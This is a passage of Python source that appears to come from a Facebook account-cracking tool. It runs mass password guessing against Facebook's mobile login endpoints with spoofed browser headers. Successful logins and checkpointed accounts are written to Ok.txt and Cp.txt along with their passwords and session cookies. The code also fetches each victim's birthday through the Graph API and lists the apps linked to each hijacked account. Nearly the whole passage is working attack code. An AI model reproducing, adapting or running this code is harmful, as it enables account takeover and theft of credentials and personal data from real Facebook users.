_headers = {"Host":"free.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","origin":"https://free.facebook.com","content-type":"application/x-www-form-urlencoded","user-agent":"Mozilla/5.0 (Linux; Android 4.4.4; en-au; SAMSUNG SM-N915G Build/KTU84P) AppleWebKit/537.36 (KTHML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://free.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
po = ses.post("https://free.facebook.com/login/device-based/validate-password/?shbl=0", data = dataa, headers=_headers, allow_redirects = False)
if "c_user" in ses.cookies.get_dict():
try:
coki=";".join([key+"="+value for key,value in ses.cookies.get_dict().items()])
print('\r %s--> %s • %s • %'%(H,user,pw,coki))
cek_apk(coki)
ok.append("%s • %s • %s "%(user,pw,coki))
open('Ok.txt', 'a').write(" --> %s • %s • %s\n"%(user,pw,coki))
break
except (KeyError, IOError):
day = ''
month = ''
year = ''
except:
pass
print('\r %s--> %s • %s • %s '%(H,user,pw,coki))
cek_apk(coki)
ok.append('%s • %s • %s'%(user,pw,coki))
open('Ok.txt', 'a').write(' --> %s • %s • %s\n'%(user,pw,coki))
break
elif 'checkpoint' in ses.cookies.get_dict():
try:
dihi = open('token.x', 'r').read()
lahir = requests.get(f"https://graph.facebook.com/{user}?fields=birthday&access_token={dihi}").json()['birthday']
day, month, year = lahir.split('/')
month = bulan12[month]
print('\r %s--> %s • %s '%(K,user,pw))
cp.append("%s • %s"%(user,pw,))
open('Cp.txt', 'a').write(" --> %s • %s \n"%(user,pw))
break
except (KeyError, IOError):
day = ''
month = ''
year = ''
except:
pass
print('\r %s--> %s • %s '%(K,user,pw))
cp.append('%s • %s'%(user,pw))
open('Cp.txt', 'a').write(" --> %s | %s\n"%(user,pw))
break
else:
continue
loop += 1
except requests.exceptions.ConnectionError:
time.sleep(31)
loop += 1
self.b_api(user,pwx)
def metod2(self,user,pwx):
global loop,ok,cp # METOK
ram = random.choice([M,P,H,U,J,N,B])
fikA = loop*100/len(self.id)
nufikhaXD = '%'
print('\r%s [crack] %s/%s [OK:%s-CP:%s] >< %s%s%s '%(ram,loop,len(self.id),len(ok),len(cp),int(fikA),str(nufikhaXD),N), end=' ');sys.stdout.flush()
ua = random.choice(ugen)
ua2 = random.choice(ugen2)
ses = requests.Session()
for pw in pwx:
try:
tix = time.time()
ses.headers.update({"Host":'m.facebook.com',"upgrade-insecure-requests":"1","user-agent":ua2,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","dnt":"1","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://m.facebook.com/","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"})
p = ses.get('https://m.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F').text
dataa ={"lsd":re.search('name="lsd" value="(.*?)"', str(p)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p)).group(1),"uid":user,"flow":"login_no_pin","pass":pw,"next":"https://developers.facebook.com/tools/debug/accesstoken/"}
ses.headers.update({"Host":'m.facebook.com',"cache-control":"max-age=0","upgrade-insecure-requests":"1","origin":"https://m.facebook.com","content-type":"application/x-www-form-urlencoded","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://m.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"})
po = ses.post('https://m.facebook.com/login/device-based/validate-password/?shbl=0',data=dataa,allow_redirects=False)
if "checkpoint" in po.cookies.get_dict().keys():
print('\r %s--> %s • %s'%(K,user,pw))
cp.append("%s|%s"%(user, pw))
open("cp.txt","a").write("%s|%s\n"%(user, pw))
open("checkcp.txt","a").write("--> %s|%s\n"%(user, pw))
break
elif "c_user" in ses.cookies.get_dict().keys():
coki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print('\r %s--> %s • %s %s'%(H,user,pw,N))
cek_apk(coki)
ok.append("%s|%s|%s"%(user, pw, coki))
open("ok.txt","a").write("--> %s|%s|%s\n"%(user, pw, coki))
break
else:
continue
except requests.exceptions.ConnectionError:
time.sleep(31)
loop+=1
def mbasic(self,user,pwx):
global loop,ok,cp
asw = random.choice([M,K,H,U])
mmk = random.choice([K,M,U,H])
sys.stdout.write('\r %s* %s[%scrack%s] %s/%s [OK:%s CP:%s] %s* '%(asw,N,H,N,loop,len(self.id),len(ok),len(cp),mmk));sys.stdout.flush()
try:
for pw in pwx:
pw = pw.lower()
ses = requests.Session()
ua = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","Mozilla/5.0 (Linux; Android 4.4.4; en-au; SAMSUNG SM-N915G Build/KTU84P) AppleWebKit/537.36 (KTHML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.87.90 Mobile Safari/537.36 NokiaBrowser/1.0,gzip(gfe)","Mozilla/5.0 (Linux; U; Android 4.4.2; zh-CN; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.2214.89 UCBrowser/11.3.8.909 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 10; M2006C3MG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 7.0; SM-G930VC Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36"])
headers_ = {"Host":"mbasic.facebook.com","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","dnt":"1","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://mbasic.facebook.com/","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
p = ses.get('https://mbasic.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F', headers=headers_).text
dataa = {"lsd":re.search('name="lsd" value="(.*?)"', str(p)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p)).group(1),"uid":user,"flow":"login_no_pin","pass":pw,"next":"https://developers.facebook.com/tools/debug/accesstoken/"}
_headers = {"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","origin":"https://mbasic.facebook.com","content-type":"application/x-www-form-urlencoded","user-agent":"Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://mbasic.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
po = ses.post("https://mbasic.facebook.com/login/device-based/validate-password/?shbl=0", data = dataa, headers=_headers, allow_redirects = False)
if 'c_user' in ses.cookies.get_dict():
try:
coki =";".join([key+"="+value for key,value in ses.cookies.get_dict().items()])
nunu = open('token.x', 'r').read()
lahir = requests.get(f"https://graph.facebook.com/{user}?fields=birthday&access_token={nunu}").json()['birthday']
day, month, year = lahir.split('/')
month = bulan12[month]
print('\r %s--> %s • %s • %s %s %s • %s'%(H,user,pw,day,month,year,coki))
cek_apk(coki)
ok.append("%s • %s • %s %s %s • %s "%(user,pw,day,month,year,kukis))
open('Ok.txt', 'a').write(" --> %s ◊ %s ◊ %s %s %s ◊ %s \n"%(user,pw,day,month,year,coki))
break
except (KeyError, IOError):
day = ''
month = ''
year = ''
except:
pass
print('\r %s--> %s • %s • %s'%(H,user,pw,coki))
cek_apk(coki)
ok.append('%s • %s • %s'%(user,pw,coki))
open('Ok.txt', 'a').write(' --> %s ◊ %s ◊ %s\n'%(user,pw,coki))
break
elif 'checkpoint' in ses.cookies.get_dict():
try:
nunu = open('token.x', 'r').read()
lahir = requests.get(f"https://graph.facebook.com/{user}?fields=birthday&access_token={nunu}").json()['birthday']
day, month, year = lahir.split('/')
month = bulan12[month]
print('\r %s--> %s • %s • %s %s %s'%(K,user,pw,day,month,year))
cp.append("%s • %s • %s %s %s"%(user,pw,day,month,year))
open('Cp.txt', 'a').write(" --> %s • %s • %s %s %s\n"%(user,pw,day,month,year))
break
except (KeyError, IOError):
day = ''
month = ''
year = ''
except:
pass
print('\r %s--> %s • %s'%(K,user,pw))
cp.append('%s • %s'%(user,pw))
open('Cp.txt', 'a').write(" --> %s • %s\n"%(user,pw))
break
else:
continue
loop += 1
except requests.exceptions.ConnectionError:
time.sleep(31)
loop += 1
self.mbasic(user,pwx)
def cek_apk(coki):
session = requests.Session()
w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=active",cookies={"cookie":"noscript=1;"+coki}).text
sop = bs4.BeautifulSoup(w,"html.parser")
x = sop.find("form",method="post")
game = [i.text for i in x.find_all("h3")]
try:
for i in range(len(game)):
print ("\r %s%s %s%s"%(N,i+1,H,game[i].replace("Ditambahkan pada"," Ditambahkan pada")))
except AttributeError:
print ("\r %s! cookie invalid"%(N))
w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=inactive",cookies={"cookie":"noscript=1;"+coki}).text
sop = bs4.BeautifulSoup(w,"html.parser")
x = sop.find("form",method="post")
game = [i.text for i in x.find_all("h3")]
try:
for i in range(len(game)):
print ("\r %s%s %s%s"%(K,i+1,N,game[i].replace("Kedaluwarsa"," Kedaluwarsa")))
except AttributeError:
print ("\r %s• cookie invalid"%(M))
if __name__ == '__main__':
os.system('git pull')
menu().main()
folder()